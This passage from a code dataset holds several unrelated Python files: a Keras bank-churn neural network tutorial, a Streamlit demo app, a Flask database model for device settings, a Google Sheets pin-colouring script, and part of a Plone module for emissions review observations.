main()","repo_name":"psmiley2/Paper-1-Morphogenesis","sub_path":"simulation/generateAllGraphs.py","file_name":"generateAllGraphs.py","file_ext":"py","file_size_in_byte":29665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9908306025","text":"# Artificial Neural Network\n\n# Installing Theano\n# pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git\n\n# Installing Tensorflow\n# pip install tensorflow\n\n# Installing Keras\n# pip install --upgrade keras\n\n# Part 1 - Data Preprocessing\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Churn_Modelling.csv')\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n\n# Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n# Encode the countries\nlabelencoder_X_1 = LabelEncoder()\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\n# Encode the gender\nlabelencoder_X_2 = LabelEncoder()\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\n# One hot encode countries\nonehotencoder = OneHotEncoder(categorical_features = [1])\nX = onehotencoder.fit_transform(X).toarray()\n# Remove first dummy variable from one-hot encoded countries to avoid overfitting\n# Data still remains valid, that country is represented by 0's in the other 2 columns\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n# Part 2 - Now let's make the ANN!\n\n# Importing the Keras libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\n\n# Initialising the ANN\nmodel = Sequential()\n\n# First layer includes setting up size of input layer.\n# This layer has 6 neurons\nmodel.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))\nmodel.add(Dropout(p=0.1))\n\n# Second Hidden Layer\nmodel.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\nmodel.add(Dropout(p=0.1))\n\n# Output layer, sigmoid activation\nmodel.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n\n# Compile it\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# Fit the model to the training set\nmodel.fit(x=X_train, y=y_train, batch_size=10, epochs=100)\n\n# Part 3 - Making predictions and evaluating the model\n\n# Predicting the Test set results\ny_pred = model.predict(X_test)\ny_pred = (y_pred > 0.5)\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\n# HW 1\n# Geography: France = [0, 0]\n# Gender: Male = [1]\n\n\"\"\"\nGeography: France\nCredit Score: 600\nGender: Male\nAge: 40 years old\nTenure: 3 years\nBalance: $60000\nNumber of Products: 2\nDoes this customer have a credit card ? 
Yes\nIs this customer an Active Member: Yes\nEstimated Salary: $50000\n\"\"\"\n\nX_temp = [[0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]]\nX_temp = sc.transform(X_temp)\n\nmodel.predict(X_temp)\n\n\n# Part 4 - Evaluating Model and Tuning it\n\n# Evaluate Performance\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\ndef build_classifier():\n    model = Sequential()\n    \n    model.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))\n    model.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n    model.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n    \n    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n    return model\n\nclassifier = KerasClassifier(build_fn=build_classifier, batch_size=10, epochs=100)\naccuracies = cross_val_score(estimator=classifier, X=X_train, y=y_train, cv=10)\n\nmean = accuracies.mean()\nstd_dev = accuracies.std()\n\n# Improving the ANN\n# Dropout Regularization\n\n# Tuning the ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\ndef build_classifier(optimizer):\n    model = Sequential()\n    \n    model.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))\n    model.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n    model.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n    \n    model.compile(optimizer=optimizer, loss='binary_crossentropy', metrics=['accuracy'])\n    return model\n\nclassifier = KerasClassifier(build_fn=build_classifier)\nparams = {'batch_size': [25, 32],\n          'epochs': [100, 500],\n          'optimizer': ['adam', 'rmsprop']}\ngrid_search = GridSearchCV(estimator=classifier, param_grid=params, scoring='accuracy', cv=10)\ngrid_search = grid_search.fit(X_train, y_train)\nbest_params = grid_search.best_params_\nbest_accuracy = grid_search.best_score_\n\n","repo_name":"baker-travis/udemy-deep-learning","sub_path":"Volume 1 - Supervised Deep Learning/Part 1 - Artificial Neural Networks (ANN)/Section 2 - Part 1 - ANN/Artificial_Neural_Networks/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"7228584520","text":"import streamlit as st\nimport pandas as pd\nimport time\n\n#localhost and 127.0.0.1 are the same thing\n#streamlit has the advantage that any change you make in the code is reflected automatically\n#this is a feature it shares with React\n\nst.title('Startup Dashboard')\nst.header('I am learning Streamlit')\nst.subheader('And I am loving it')\nst.text(\"This is a normal text\")\nst.markdown(\"\"\"\n- Race 3\n- Humshakals\n- Housefull\n\"\"\")\nst.code(\"\"\"\ndef foo(input):\n    return input**2\n\nx= foo(2) \n \"\"\")\nst.latex('x^2 + y^2 +2 =0')\n\ndf=pd.DataFrame({\n    'name': [\"Shraddha\",\"Bhakti\",\"Unknown\"],\n    'marks': [60,70,80],\n    'package': [10,12,14]\n})\n\nst.dataframe(df)\nst.metric('Revenue','Rs 3L','3%')\nst.json({\n    'name': [\"Shraddha\",\"Bhakti\",\"Unknown\"],\n    'marks': [60,70,80],\n    'package': [10,12,14]\n})\n#st.image('IMG_6353.JPG')\nst.sidebar.title(\"Love you\")\n\n#col1, col2 = st.columns(3)\n\n#with col1:\n    #st.image(\"IMG_6353.JPG\")\n\n#with col2:\n    #st.image(\"IMG_6353.JPG\")\n\nst.error(\"Login 
Failed\")\nst.success(\"Login Successfully\")\nst.info(\"This is streamlit, use wisely\")\nst.warning(\"God helps those who helps themselves\")\nbar = st.progress(0)\nfor i in range(1,101):\n time.sleep(0.1)\n bar.progress(i)\n\nemail = st.text_input('Enter Email')\nnumber = st.number_input('Enter Age')\nst.date_input('Enter registration date')\n","repo_name":"shraddha980/StarupDashboard","sub_path":"StreamlitExample.py","file_name":"StreamlitExample.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22111536668","text":"from models.db import db\nfrom datetime import datetime\n\n\nclass GetSettingResponse(db.Model):\n __tablename__ = 'getsetting_response'\n Response_ID = db.Column(db.Integer, primary_key=True, autoincrement=True)\n Getsetting_ID = db.Column(db.Integer, db.ForeignKey('getsetting.Getsetting_ID'))\n Responding_Type = db.Column(db.Integer)\n Flag = db.Column(db.String)\n SN = db.Column(db.String, unique=True)\n Command_Type = db.Column(db.Integer)\n Speed = db.Column(db.Integer)\n Recording_Cycle = db.Column(db.Integer)\n Upload_Cycle = db.Column(db.Integer)\n Fixed_Time_Upload = db.Column(db.Integer)\n Upload_Hour_1 = db.Column(db.Integer)\n Upload_Minute_1 = db.Column(db.Integer)\n Upload_Hour_2 = db.Column(db.Integer)\n Upload_Minute_2 = db.Column(db.Integer)\n Upload_Minute_3 = db.Column(db.Integer)\n Upload_Hour_3 = db.Column(db.Integer)\n Upload_Hour_4 = db.Column(db.Integer)\n Upload_Minute_4 = db.Column(db.Integer)\n Model = db.Column(db.Integer)\n Disable_Type = db.Column(db.Integer)\n Mac_Address_1 = db.Column(db.String)\n Mac_Address_2 = db.Column(db.String)\n Mac_Address_3 = db.Column(db.String)\n DateTime = db.Column(db.DateTime)\n OpenTime = db.Column(db.Time)\n CloseTime = db.Column(db.Time)\n Res_1 = db.Column(db.String)\n Res_2 = db.Column(db.String)\n Create_DateTime = db.Column(db.DateTime, default=datetime.now())\n Update_DateTime = db.Column(db.DateTime)\n\n def __init__(self, Getsetting_ID, Responding_Type, Flag, SN, Command_Type, Speed, Recording_Cycle, Upload_Cycle, Fixed_Time_Upload, Upload_Hour_1,\n Upload_Minute_1, Upload_Hour_2, Upload_Minute_2, Upload_Hour_3, Upload_Minute_3, Upload_Hour_4, Upload_Minute_4,\n Model, Disable_Type, Mac_Address_1, Mac_Address_2, Mac_Address_3, DateTime, OpenTime, CloseTime, Res_1, Res_2):\n\n self.Getsetting_ID = Getsetting_ID\n self.Responding_Type = Responding_Type\n self.Flag = Flag\n self.SN = SN\n self.Command_Type = Command_Type\n self.Speed = Speed\n self.Recording_Cycle = Recording_Cycle\n self.Upload_Cycle = Upload_Cycle\n self.Fixed_Time_Upload = Fixed_Time_Upload\n self.Upload_Hour_1 = Upload_Hour_1\n self.Upload_Minute_1 = Upload_Minute_1\n self.Upload_Hour_2 = Upload_Hour_2\n self.Upload_Minute_2 = Upload_Minute_2\n self.Upload_Hour_3 = Upload_Hour_3\n self.Upload_Minute_3 = Upload_Minute_3\n self.Upload_Hour_4 = Upload_Hour_4\n self.Upload_Minute_4 = Upload_Minute_4\n self.Model = Model\n self.Disable_Type = Disable_Type\n self.Mac_Address_1 = Mac_Address_1\n self.Mac_Address_2 = Mac_Address_2\n self.Mac_Address_3 = Mac_Address_3\n self.DateTime = DateTime\n self.OpenTime = OpenTime\n self.Res_1 = Res_1\n self.Res_2 = Res_2\n self.CloseTime = CloseTime\n self.Update_DateTime = datetime.now()\n\n\n def update(self, db, str, id):\n self.Getsetting_ID = id\n str.Responding_Type = self.Responding_Type\n str.Flag = self.Flag\n str.Command_Type = self.Command_Type\n str.Speed = self.Speed\n 
str.Recording_Cycle = self.Recording_Cycle\n str.Upload_Cycle = self.Upload_Cycle\n str.Fixed_Time_Upload = self.Fixed_Time_Upload\n str.Upload_Hour_1 = self.Upload_Hour_1\n str.Upload_Minute_1 = self.Upload_Minute_1\n str.Upload_Hour_2 = self.Upload_Hour_2\n str.Upload_Minute_2 = self.Upload_Minute_2\n str.Upload_Hour_3 = self.Upload_Hour_3\n str.Upload_Minute_3 = self.Upload_Minute_3\n str.Upload_Hour_4 = self.Upload_Hour_4\n str.Upload_Minute_4 = self.Upload_Minute_4\n str.Model = self.Model\n str.Disable_Type = self.Disable_Type\n str.Mac_Address_1 = self.Mac_Address_1\n str.Mac_Address_2 = self.Mac_Address_2\n str.Mac_Address_3 = self.Mac_Address_3\n str.DateTime = self.DateTime\n str.OpenTime = self.OpenTime\n str.CloseTime = self.CloseTime\n str.Res_1 = self.Res_1\n str.Res_2 = self.Res_2\n str.Update_DateTime = self.Update_DateTime\n\n db.session.commit()\n \n\n ","repo_name":"devlifestyletech/People-Counting-API","sub_path":"Python-Flask/src/models/getsetting_response.py","file_name":"getsetting_response.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9733894415","text":"from __future__ import print_function\nimport re\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\n\nre_pin_pos = re.compile('([A-Z]+)([0-9]+)')\nrow_names = 'A B C D E F G H J K L M N P R T U V W Y AA AB AC AD AE AF'.split()\nrow_dict = {}\nfor i in range(len(row_names)):\n row_dict[row_names[i]] = i;\n\ndef is_reserved(cells):\n return cells[1].startswith('VCC') or cells[3] == 'NA' or cells[3] == '0'\n\ncolor_table = {\n '13': [254, 190, 37],\n '14': [192, 215, 47],\n '15': [143, 84, 162],\n '16': [ 75, 187, 235],\n '33': [ 96, 191, 133],\n '34': [217, 139, 62],\n '35': [217, 64, 140],\n '36': [141, 140, 196]\n}\n\ndef parse_line(str):\n cells = str.split()\n m = re_pin_pos.match(cells[0])\n if is_reserved(cells):\n color = [0, 0, 0]\n elif 'MRCC' in cells[1] or 'SRCC' in cells[1]:\n color = [x/255.0 for x in color_table[cells[3]]]\n else:\n color = [1.0 - (1.0-x/255.0)/2.0 for x in color_table[cells[3]]]\n return [row_dict[m[1]], int(m[2])-1, color, cells[1]]\n\ndef read_file():\n f = open('xc7s75fgga676pkg.txt', 'r')\n str = f.read()\n lines = str.splitlines()\n while not lines[0].startswith('Pin'):\n lines = lines[1:]\n lines = lines[1:677]\n parsed = [parse_line(l) for l in lines]\n return parsed\n\ndef make_req(cells):\n return {\n 'updateCells': {\n 'rows': {\n 'values': {\n 'userEnteredFormat': {\n 'backgroundColor': {\n 'red' : cells[2][0],\n 'green': cells[2][1],\n 'blue' : cells[2][2],\n 'alpha': 0\n }\n }\n }\n },\n 'fields': 'userEnteredFormat.backgroundColor',\n 'range': {\n 'sheetId' : 0,\n 'startRowIndex' : cells[0],\n 'endRowIndex' : cells[0]+1,\n 'startColumnIndex' : cells[1],\n 'endColumnIndex' : cells[1]+1\n } \n }\n }\n\ndef send_req(requests):\n SCOPES = 'https://www.googleapis.com/auth/spreadsheets'\n store = file.Storage('token.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('sheets', 'v4', http=creds.authorize(Http()))\n\n # Call the Sheets API\n SPREADSHEET_ID = '1dbaI85LP1wxyuTcN2SBk3hkD-OO9-PNyjfBb0-ARnVY'\n response = service.spreadsheets().batchUpdate(\n spreadsheetId=SPREADSHEET_ID, body={'requests': requests}).execute()\n print(response)\n\ndef main():\n table = 
read_file()\n requests = [make_req(x) for x in table]\n send_req(requests)\n\nmain()\n","repo_name":"yammouch/python_lesson","sub_path":"1010_gsheet/0010_xc7s75/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22361241388","text":"try:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\nimport datetime\nimport simplejson as json\nimport re\nfrom itertools import chain\nfrom functools import partial\nfrom docx import Document\nfrom docx.shared import Pt\nfrom docx.enum.style import WD_STYLE_TYPE\nfrom AccessControl import getSecurityManager\nfrom Acquisition import aq_inner\nfrom Acquisition import aq_base\nfrom Acquisition.interfaces import IAcquirer\nfrom emrt.necd.content.roles.localrolesubscriber import grant_local_roles\nfrom plone import api\nfrom plone.app.contentlisting.interfaces import IContentListing\nfrom plone.dexterity.browser import add\nfrom plone.dexterity.browser import edit\nfrom plone.dexterity.browser.view import DefaultView\nfrom plone.dexterity.interfaces import IDexterityFTI\nfrom plone.app.discussion.interfaces import IConversation\nfrom plone.dexterity.content import Container\nfrom plone.directives import form\nfrom plone.namedfile.interfaces import IImageScaleTraversable\nfrom plone.supermodel import model\nfrom plone.z3cform.interfaces import IWrappedForm\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFEditions import CMFEditionsMessageFactory as _CMFE\nfrom Products.CMFPlone.utils import safe_unicode\nfrom Products.Five import BrowserView\nfrom Products.statusmessages.interfaces import IStatusMessage\nfrom time import time\nfrom z3c.form import button\nfrom z3c.form import field\nfrom z3c.form import interfaces\nfrom z3c.form import validator\nfrom z3c.form.browser.checkbox import CheckBoxFieldWidget\nfrom z3c.form.form import Form\nfrom z3c.form.interfaces import ActionExecutionError\nimport zope.schema as schema\nfrom zope.browsermenu.menu import getMenu\nfrom zope.browserpage.viewpagetemplatefile import (\n ViewPageTemplateFile as Z3ViewPageTemplateFile\n)\nfrom zope.component import createObject\nfrom zope.component import getUtility\nfrom zope.component import getMultiAdapter\nfrom zope.event import notify\nfrom zope.i18n import translate\nfrom zope.interface import alsoProvides\nfrom zope.interface import implementer\nfrom zope.interface import Invalid\nfrom zope.lifecycleevent import ObjectModifiedEvent\nfrom emrt.necd.content import MessageFactory as _\nfrom eea.cache import cache\nfrom .comment import IComment\nfrom .commentanswer import ICommentAnswer\nfrom .nfr_code_matching import get_category_ldap_from_nfr_code\nfrom .nfr_code_matching import get_category_value_from_nfr_code\nfrom emrt.necd.content.subscriptions.interfaces import (\n INotificationUnsubscriptions\n)\nfrom emrt.necd.content.constants import LDAP_SECTOREXP\nfrom emrt.necd.content.constants import ROLE_SE\nfrom emrt.necd.content.constants import ROLE_CP\nfrom emrt.necd.content.constants import ROLE_LR\nfrom emrt.necd.content.constants import P_OBS_REDRAFT_REASON_VIEW\nfrom emrt.necd.content.constants import ROLE_MSE\nfrom emrt.necd.content.utils import get_vocabulary_value\nfrom emrt.necd.content.utils import hidden\nfrom emrt.necd.content.utils import get_user_sectors\nfrom emrt.necd.content.utilities import ms_user\nfrom emrt.necd.content.utilities.interfaces import IFollowUpPermission\nfrom 
emrt.necd.content.utilities.interfaces import IGetLDAPWrapper\nfrom emrt.necd.content.vocabularies import get_registry_interface_field_data\nfrom emrt.necd.content.vocabularies import INECDVocabularies\n\n# [refs #104852] Hide Projection Year and Reference Year for\n# users with these sectors.\n# [refs #134554] No longer used\nPROJECTION_HIDE_YEARS = ('sector9', )\nRE_YEAR = r'\\d{4}'\n\n\ndef projection_hide_for_user():\n # This is no longer used (#134554)\n return False\n # user = api.user.get_current()\n\n # # Managers (Secretariat) should never be excluded.\n # if 'Manager' in user.getRoles():\n # return False\n\n # user_sectors = get_user_sectors(user)\n # return set(PROJECTION_HIDE_YEARS).intersection(user_sectors)\n\n\ndef get_nfr_title_projection(fname):\n names = dict(\n nfr_code=u'Review sectors for Projections, NAPCP and PaMs',\n nfr_code_inventory=u'Review sub sectors'\n )\n return names[fname]\n\n\n# Cache helper methods\ndef _user_name(fun, self, userid):\n return (userid, time() // 86400)\n\n\ndef _is_projection(context):\n return context.type == 'projection'\n\n\ndef check_parameter(value):\n if len(value) == 0:\n raise Invalid(u'You need to select at least one parameter.')\n\n return True\n\n\ndef check_pollutants(value):\n if len(value) == 0:\n raise Invalid(u'You need to select at least one pollutant.')\n\n return True\n\n\ndef check_country(value):\n user = api.user.get_current()\n groups = user.getGroups()\n valid = False\n for group in groups:\n if group.startswith('{}-'.format(LDAP_SECTOREXP)) and \\\n group.endswith('-%s' % value):\n valid = True\n\n if not valid:\n raise Invalid(\n u'You are not allowed to add observations for this country'\n )\n\n return True\n\n\ndef inventory_year(value):\n \"\"\"\n Inventory year can be a given year (2014), a range of years (2012-2014)\n or a list of the years (2012, 2014, 2016)\n \"\"\"\n def split_on_sep(val, sep):\n for s in sep:\n if s in val:\n return tuple(val.split(s))\n return (val, )\n\n def validate(value):\n normalized_value = (val.strip() for val in split_on_sep(value, '-,;'))\n return False not in (\n int(val) in range(1000, 10000) for val in normalized_value\n )\n\n def check_valid(value):\n try:\n return validate(value)\n except ValueError:\n return False\n\n if not check_valid(value):\n raise Invalid(u'Inventory year format is not correct. ')\n\n return True\n\n\ndef default_year():\n return datetime.datetime.now().year\n\n\n# Interface class; used to define content-type schema.\nclass IObservation(model.Schema, IImageScaleTraversable):\n \"\"\"\n New review observation\n \"\"\"\n text = schema.Text(\n title=u'Short description by sector expert',\n required=True,\n description=(\n u\"Describe the issue identified. Keep it short, you cannot \"\n u\"change this description once you have sent it to LR. MS can \"\n u\"only see the question once it has been approved and sent by \"\n u\"the LR. 
The question to the MS should be asked in the Q&A tab, \"\n u\"not here.\"\n )\n )\n\n country = schema.Choice(\n title=u\"Country\",\n vocabulary='emrt.necd.content.eea_member_states',\n required=True,\n )\n\n nfr_code = schema.Choice(\n title=u\"NFR category codes\",\n vocabulary='emrt.necd.content.nfr_code',\n required=True,\n )\n\n nfr_code_inventory = schema.Choice(\n title=u\"NFR inventories category code\",\n vocabulary='emrt.necd.content.nfr_code_inventories',\n required=False,\n )\n\n year = schema.TextLine(\n title=u'Inventory year',\n description=u'Inventory year can be a given year (2014), a range of '\n u'years (2012-2014) or a list of the years '\n u'(2012, 2014, 2016)',\n constraint=inventory_year,\n required=True,\n )\n\n reference_year = schema.Int(\n title=u'Reference year',\n required=True,\n min=1000,\n max=9999\n )\n\n form.widget(pollutants=CheckBoxFieldWidget)\n pollutants = schema.List(\n title=u\"Pollutants\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.pollutants',\n ),\n constraint=check_pollutants,\n required=True,\n )\n\n form.widget(scenario=CheckBoxFieldWidget)\n scenario = schema.List(\n title=u\"Scenario Type\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.scenario_type'\n ),\n required=False,\n )\n\n review_year = schema.Int(\n title=u'Review year',\n description=u'Review year is the year in which the inventory was '\n u'submitted and the review was carried out',\n defaultFactory=default_year,\n required=True,\n )\n\n fuel = schema.Choice(\n title=u\"Fuel\",\n vocabulary='emrt.necd.content.fuel',\n required=False,\n )\n\n activity_data_type = schema.Choice(\n title=u\"Activity Data Type\",\n vocabulary='emrt.necd.content.activity_data_type',\n required=False,\n )\n\n form.widget(activity_data=CheckBoxFieldWidget)\n activity_data = schema.List(\n title=u\"Activity Data\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.activity_data',\n ),\n required=False,\n )\n\n ms_key_category = schema.Bool(\n title=u\"MS key category\",\n )\n\n form.widget(parameter=CheckBoxFieldWidget)\n parameter = schema.List(\n title=u\"Parameter\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.parameter',\n ),\n constraint=check_parameter,\n required=True,\n )\n\n form.widget(highlight=CheckBoxFieldWidget)\n highlight = schema.List(\n title=u\"Description flags\",\n description=(\n u\"Description flags highlight important information \"\n u\"that is closely related to the item.\"\n ),\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.highlight',\n ),\n required=False,\n default=[],\n )\n\n form.write_permission(closing_comments='cmf.ManagePortal')\n closing_comments = schema.Text(\n title=u'Finish request comments',\n required=False,\n )\n\n form.write_permission(closing_deny_comments='cmf.ManagePortal')\n closing_deny_comments = schema.Text(\n title=u'Finish deny comments',\n required=False,\n )\n\n\nclass NfrCodeContextValidator(validator.SimpleFieldValidator):\n def validate(self, value, force=False):\n \"\"\" Check if the user is in one of the group of users\n allowed to add this category NFR Code observations\n \"\"\"\n category = get_category_ldap_from_nfr_code(value, self.context)\n user = api.user.get_current()\n groups = user.getGroups()\n if \"Manager\" not in api.user.get_roles(user=user):\n valid = False\n ldap_wrapper = getUtility(IGetLDAPWrapper)(self.context)\n ldap_se = ldap_wrapper(LDAP_SECTOREXP)\n for group in groups:\n if group.startswith('{}-{}-'.format(ldap_se, category)):\n valid = True\n 
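# one matching sector-expert group is enough\n                    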
break\n if not valid:\n raise Invalid(\n u'You are not allowed to add observations '\n u'for this sector category.'\n )\n\n\nvalidator.WidgetValidatorDiscriminators(\n NfrCodeContextValidator,\n field=IObservation['nfr_code']\n)\n\n\nclass CountryContextValidator(validator.SimpleFieldValidator):\n def validate(self, value):\n user = api.user.get_current()\n groups = user.getGroups()\n if \"Manager\" not in api.user.get_roles(user=user):\n valid = False\n\n ldap_wrapper = getUtility(IGetLDAPWrapper)(self.context)\n ldap_se = ldap_wrapper(LDAP_SECTOREXP)\n\n for group in groups:\n is_se = group.startswith('{}-'.format(ldap_se))\n if is_se and group.endswith('-%s' % value):\n valid = True\n break\n\n if not valid:\n raise Invalid(\n u'You are not allowed to add observations for this country.'\n )\n\n\nvalidator.WidgetValidatorDiscriminators(\n CountryContextValidator,\n field=IObservation['country']\n)\n\n\ndef set_title_to_observation(obj, event):\n sector = safe_unicode(obj.ghg_source_category_value())\n pollutants = safe_unicode(obj.pollutants_value())\n obj_year = (\n obj.year if (\n isinstance(obj.year, basestring)\n or isinstance(obj.year, int)\n )\n else ', '.join(obj.year)\n ) if obj.year else u''\n inventory_year = safe_unicode(str(obj_year))\n parameter = safe_unicode(obj.parameter_value())\n obj.title = u' '.join([sector, pollutants, inventory_year, parameter])\n grant_local_roles(obj)\n\n\ndef get_join_from_vocab(context, vocab, values):\n result = u''\n\n if values:\n get_value = partial(get_vocabulary_value, context, vocab)\n result = u', '.join([get_value(v) for v in values if v])\n\n return result\n\n\ndef get_list_from_vocab(context, vocab, values):\n result = []\n\n if values:\n get_value = partial(get_vocabulary_value, context, vocab)\n result = [get_value(v) for v in values]\n\n return result\n\n\n@implementer(IObservation)\nclass Observation(Container):\n\n def get_values(self):\n \"\"\"\n Memoized version of values, to speed-up\n \"\"\"\n return self.values()\n\n def get_values_cat(self, portal_type=None):\n if portal_type is not None:\n return self.listFolderContents(\n contentFilter={'portal_type': portal_type}\n )\n else:\n return self.listFolderContents()\n\n def get_nfr_code(self):\n \"\"\" stupid method to avoid name-clashes with the existing\n vocabularies when cataloging \"\"\"\n return self.nfr_code\n\n def get_ghg_source_sectors(self):\n \"\"\" stupid method to avoid name-clashes with the existing\n vocabularies when cataloging \"\"\"\n return self.ghg_source_sectors_value()\n\n def get_highlight(self):\n \"\"\" stupid method to avoid name-clashes with the existing\n vocabularies when cataloging \"\"\"\n return self.highlight\n\n def country_value(self):\n return get_vocabulary_value(\n self, 'emrt.necd.content.eea_member_states', self.country\n )\n\n def nfr_code_value(self):\n # Same as ghg_source_sectors_value as the object reindex\n # might be triggered by a user that doesn't have access\n # to the current nfr code, resulting in an empty value\n # getting indexed.\n return self.ghg_source_sectors_value()\n\n def ghg_source_category_value(self):\n # Get the value of the sector to be used on the LDAP mapping\n return get_category_ldap_from_nfr_code(self.nfr_code, self.aq_parent)\n\n def ghg_source_sectors_value(self):\n # Get the value of the sector to be used\n # on the Observation Metadata screen\n return get_category_value_from_nfr_code(self.nfr_code, self.aq_parent)\n\n def parameter_value(self):\n return get_join_from_vocab(\n self.aq_parent, 
'emrt.necd.content.parameter', self.parameter)\n\n def pollutants_value(self):\n return get_join_from_vocab(\n self.aq_parent, 'emrt.necd.content.pollutants', self.pollutants)\n\n def activity_data_value(self):\n return get_list_from_vocab(\n self.aq_parent,\n 'emrt.necd.content.activity_data', self.activity_data)\n\n def highlight_value(self):\n return get_join_from_vocab(\n self.aq_parent, 'emrt.necd.content.highlight', self.highlight)\n\n def scenario_type_value(self):\n return get_join_from_vocab(\n self.aq_parent, 'emrt.necd.content.scenario_type', self.scenario)\n\n def finish_reason_value(self):\n return get_vocabulary_value(\n self.aq_parent,\n 'emrt.necd.content.finishobservationreasons',\n self.closing_reason\n )\n\n def finish_deny_reason_value(self):\n return get_vocabulary_value(\n self.aq_parent,\n 'emrt.necd.content.finishobservationdenyreasons',\n self.closing_deny_reason\n )\n\n def get_status(self):\n return api.content.get_state(self)\n\n def can_draft_conclusions(self):\n questions = self.get_values_cat('Question')\n if len(questions) > 0:\n q = questions[0]\n return q.get_state_api() in [\n 'draft',\n 'drafted',\n 'recalled-lr',\n 'closed',\n ]\n else:\n return True\n\n def can_close(self):\n if self.get_status() in ['pending']:\n questions = self.get_values_cat('Question')\n if len(questions) > 0:\n for q in questions:\n if q.get_state_api() not in ['closed']:\n return False\n return True\n\n return False\n\n def wf_location(self):\n status = self.get_status()\n if status in ('draft', 'conclusions', 'conclusions-lr-denied'):\n return 'Sector Expert'\n elif status == 'closed':\n return 'Lead reviewer'\n elif status == 'conclusion-discussion':\n return 'Counterpart'\n elif status == 'close-requested':\n return 'Lead reviewer'\n else:\n questions = self.get_values_cat('Question')\n if questions:\n question = questions[0]\n state = question.get_state_api()\n if state in ['draft', 'closed']:\n return 'Sector Expert'\n elif state in ['counterpart-comments']:\n return 'Counterparts'\n elif state in ['drafted', 'recalled-lr']:\n return 'Lead reviewer'\n elif state in [\n 'pending',\n 'answered',\n 'pending-answer-drafting',\n 'recalled-msa']:\n return 'Member state coordinator'\n elif state in ['expert-comments']:\n return 'Member state experts'\n else:\n return \"Sector Expert\"\n\n def wf_status(self):\n if self.get_status() in ['draft']:\n return ['Observation created', \"observationIcon\"]\n elif self.get_status() in ['closed']:\n return ['Observation finished', \"observationIcon\"]\n elif self.get_status() in ['close-requested']:\n return ['Observation finish requested', \"observationIcon\"]\n elif self.get_status() in ['conclusions', 'conclusions-lr-denied']:\n return [\"Conclusion ongoing\", \"conclusionIcon\"]\n elif self.get_status() in ['conclusion-discussion']:\n return [\"Counterparts comments requested\", \"conclusionIcon\"]\n else:\n questions = self.get_values_cat('Question')\n if questions:\n question = questions[-1]\n state = question.get_state_api()\n if state in ['draft']:\n return [\"Question drafted\", \"questionIcon\"]\n elif state in ['counterpart-comments']:\n return [\"Counterpart's comments requested\", \"questionIcon\"]\n elif state in ['answered']:\n return ['Pending question', \"questionIcon\"]\n elif state in [\n 'pending',\n 'pending-answer-drafting',\n 'recalled-msa']:\n return ['Open question', \"questionIcon\"]\n elif state in ['drafted', 'recalled-lr']:\n return ['Draft question', \"questionIcon\"]\n elif state in ['expert-comments']:\n 
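# comments are being drafted by the MS experts\n                    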
